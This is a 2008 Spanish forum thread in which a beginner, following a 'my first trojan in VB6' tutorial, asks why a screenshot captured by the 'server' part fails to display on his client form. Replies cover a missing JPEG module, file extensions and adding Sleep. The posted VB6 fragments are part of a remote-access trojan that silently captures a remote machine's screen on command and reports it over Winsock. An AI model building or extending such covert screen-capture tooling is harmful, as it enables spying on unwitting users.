elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  AYUDA con insertar Imagen en FORM
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: AYUDA con insertar Imagen en FORM  (Leído 4,231 veces)
Zaoner

Desconectado Desconectado

Mensajes: 20


Ver Perfil
AYUDA con insertar Imagen en FORM
« en: 18 Noviembre 2008, 01:23 am »

Hola e seguido todo lo de este post http://foro.elhacker.net/programacion_vb/mi_primer_troyano_en_vb60-t170445.0.html;msg823252#msg823252  y lo e conseguido hacer la captura de screen pero el problema es como hacer para que el screen en jpg me muestre en el FORM de IMAGE....yo e agregado este code
Código:
Image1.Picture = LoadPicture("Desktop.bmp")
pero me tira error al cargar me dice que el jpg no esta encontrado...y yo creo que es por que esto se hace antes de que el jpg se cree por que en general tarda un pokio en crearse.....me entienden lo que digo :huh: :huh: :huh: :huh:



y otra cosa tambien es que no captura la barra de herramientas solo el escritorio  :-\









« Última modificación: 18 Noviembre 2008, 01:41 am por Zaoner » En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: AYUDA con insertar Imagen en FORM
« Respuesta #1 en: 18 Noviembre 2008, 01:39 am »

Hola, el link que pusiste es de un perfil..no veo nada...hay un modulo para pasar de bmp a jpg buscalo por ahi...

saludos.


En línea

Zaoner

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: AYUDA con insertar Imagen en FORM
« Respuesta #2 en: 18 Noviembre 2008, 01:42 am »

uuu...perdon bueno en ese link esta el code....la cosa es sencilla pero no la puedo hacer andar...es que el jpg aparezca en el form  :-\
En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: AYUDA con insertar Imagen en FORM
« Respuesta #3 en: 18 Noviembre 2008, 01:56 am »

el problema es q ese pedazito de code al cual hiciste referencia no esta completo...
eso es solo el llamado al modulo clase.. pero falta el modulo clase
tal vez el error q te tira es aqui:
Código
  1. Dim Foto As New Class1
eso es xq te falta el modulo clase CJpeg

el link esta mas arriba en ese mismo hilo posteado x EON.. el link q dejo es este:

http://www.pscode.com/vb/scripts/ShowZip.asp?lngWId=1&lngCodeId=56382&strZipAccessCode=tp%2FP563821492
En línea

Zaoner

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: AYUDA con insertar Imagen en FORM
« Respuesta #4 en: 18 Noviembre 2008, 01:59 am »

no...creo que no me entendieron  ;D el modulo ya esta agregado y el screen funciona perfecto y se guarda correctamente en la ruta especificada...pero el problema es que no se carga en el Form en el Image....eso es nomas...
En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: AYUDA con insertar Imagen en FORM
« Respuesta #5 en: 18 Noviembre 2008, 02:26 am »

Código:
Image1.Picture = LoadPicture("Desktop.bmp")

el error esta ahi... si es un jpg no tenes q cargar un bmp xD

Código:
Image1.Picture = LoadPicture("Desktop.jpg")

asi tendria q ser... de todos modos esa ruta tb esta incompleta : /
En línea

Zaoner

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: AYUDA con insertar Imagen en FORM
« Respuesta #6 en: 18 Noviembre 2008, 02:34 am »

 :P :P :P ejej eso lo puse asi nomas osea la ruta es asi:
Citar
Image1.Picture = LoadPicture("C:\capture.jpg")
y tampoco funciona.... MIEREN PARA QUE ENTIENDAN MAS FACIL ESTE ES EL CODE....


CLIENTE

Código:
Private Sub noscreen_Click()
Select Case MsgBox("Se elimino correctamente el screen anterior!", vbOKCancel + vbInformation, "Correcto")
Case vbOKCancel
Unload Me
End Select

Kill "C:\capture.jpg"

End Sub

Private Sub salir_Click()
End
End Sub

Private Sub screen_Click()
enviar "Screen"
End Sub


Y EN EL SERVER DELCARO ESTO

Código:
Dim Foto As New Class1 'Class1 es el nombre del module de clase cjpg.




Y EN LA PARTE DATTA ARRIVAL ES ASI

Código:
'SCREEN CAPTURE
       Case "Screen"
Resolucion = data(1)
Foto.SetSamplingFrequencies 2, 2, 2, 2, 2, 2
Foto.Quality = 100   'aqui ajustas la calidad dsd 1 a 100 hasi bajas calidad bajas peso
Foto.SampleScreen
Foto.SaveFile ("c:\capture.jpg")
WS.SendData "tamscreen|" & FileLen("C:\capture.jpg")


Entonces como haria para que al capturar la imagen y al ser guardad en "C" esta se muestre en el Form osea en el cliente en IMAGE
En línea

Zaoner

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: AYUDA con insertar Imagen en FORM
« Respuesta #7 en: 19 Noviembre 2008, 03:08 am »

Alguna Ayuda?  :huh: :huh:
En línea

WestOn

Desconectado Desconectado

Mensajes: 272


El testamento Maya...


Ver Perfil
Re: AYUDA con insertar Imagen en FORM
« Respuesta #8 en: 19 Noviembre 2008, 19:15 pm »

Wenas, si te refieres a q todo va bien, pero q no lo muestra porq va 'demasiado rapido', ponle un sleep:
Primero la declaracion
Código:
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
...
Código:
sleep 500
Image1.Picture = LoadPicture("Desktop.bmp")

un saludo ;)
En línea

En mi cabeza existe una barrera espacio-tiempo de 4cm³. ¿Alguien sabe como eliminarla?.
                                                                                                                                                                                                                            
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[MOD] Ayuda para insertar imagen en el foro
Sugerencias y dudas sobre el Foro
dtentor 5 4,923 Último mensaje 6 Mayo 2009, 18:20 pm
por hitori batusai
Ayuda con un form y php
PHP
krono0x 5 2,232 Último mensaje 25 Febrero 2012, 04:26 am
por krono0x
Duda php insertar en BD datos de un form que esta en un while
PHP
YamiAlx 2 2,940 Último mensaje 3 Marzo 2013, 16:53 pm
por YamiAlx
[Duda] Imagen en el Form « 1 2 3 4 »
.NET (C#, VB.NET, ASP)
SγиtαxEяяoя 32 14,718 Último mensaje 27 Mayo 2013, 22:51 pm
por z3nth10n
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines